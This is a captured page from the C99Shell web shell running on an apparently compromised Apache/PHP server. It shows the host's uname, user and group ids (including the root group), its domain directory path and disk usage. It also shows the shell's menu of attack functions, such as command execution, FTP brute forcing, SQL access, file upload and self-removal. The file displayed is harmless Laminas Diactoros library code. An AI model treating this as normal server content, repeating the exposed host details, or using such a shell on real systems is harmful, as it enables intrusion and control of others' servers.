!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/laminas/laminas-diactoros/src/functions/   drwxr-xr-x
Free 26.55 GB of 117.98 GB (22.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     normalize_server.php (1.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Laminas\Diactoros;

use function 
is_callable;

/**
 * Marshal the $_SERVER array
 *
 * Pre-processes and returns the $_SERVER superglobal. In particularly, it
 * attempts to detect the Authorization header, which is often not aggregated
 * correctly under various SAPI/httpd combinations.
 *
 * @param null|callable $apacheRequestHeaderCallback Callback that can be used to
 *     retrieve Apache request headers. This defaults to
 *     `apache_request_headers` under the Apache mod_php.
 * @return array Either $server verbatim, or with an added HTTP_AUTHORIZATION header.
 */
function normalizeServer(array $server, ?callable $apacheRequestHeaderCallback null): array
{
    if (
null === $apacheRequestHeaderCallback && is_callable('apache_request_headers')) {
        
$apacheRequestHeaderCallback 'apache_request_headers';
    }

    
// If the HTTP_AUTHORIZATION value is already set, or the callback is not
    // callable, we return verbatim
    
if (
        isset(
$server['HTTP_AUTHORIZATION'])
        || ! 
is_callable($apacheRequestHeaderCallback)
    ) {
        return 
$server;
    }

    
$apacheRequestHeaders $apacheRequestHeaderCallback();
    if (isset(
$apacheRequestHeaders['Authorization'])) {
        
$server['HTTP_AUTHORIZATION'] = $apacheRequestHeaders['Authorization'];
        return 
$server;
    }

    if (isset(
$apacheRequestHeaders['authorization'])) {
        
$server['HTTP_AUTHORIZATION'] = $apacheRequestHeaders['authorization'];
        return 
$server;
    }

    return 
$server;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--